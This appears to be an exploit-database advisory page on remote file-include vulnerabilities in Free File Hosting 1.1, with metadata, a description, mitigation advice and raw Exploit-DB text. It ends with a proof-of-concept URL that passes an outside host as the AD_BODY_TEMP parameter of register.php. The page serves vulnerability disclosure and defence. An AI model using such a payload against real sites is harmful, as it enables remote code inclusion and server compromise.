header-logo
Suggest Exploit
vendor:
Free File Hosting
by:
7.5
CVSS
HIGH
Remote File-Include
CWE
Product Name: Free File Hosting
Affected Version From: 1.1
Affected Version To: 1.1
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

Free File Hosting Multiple Remote File-Include Vulnerabilities

Multiple remote file-include vulnerabilities exist in Free File Hosting due to insufficient sanitization of user-supplied data. Exploiting these vulnerabilities can lead to compromise of the application and the underlying system, as well as other possible attacks.

Mitigation:

Properly sanitize user-supplied data to prevent remote file-include vulnerabilities. Regularly update the Free File Hosting software to the latest version.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/23118/info
  
Free File Hosting is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
  
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
  
Version 1.1 is vulnerable to these issues.
  
This BID was incorrectly reporting Free File Upload script as the affected package. Free File Upload script is the demo version of the Free File Hosting script.
  
This issue is related to BID 20781 - Free File Hosting Forgot_Pass.PHP Remote File Include Vulnerability. 

http://www.example.com/register.php?AD_BODY_TEMP=http://www.example2.com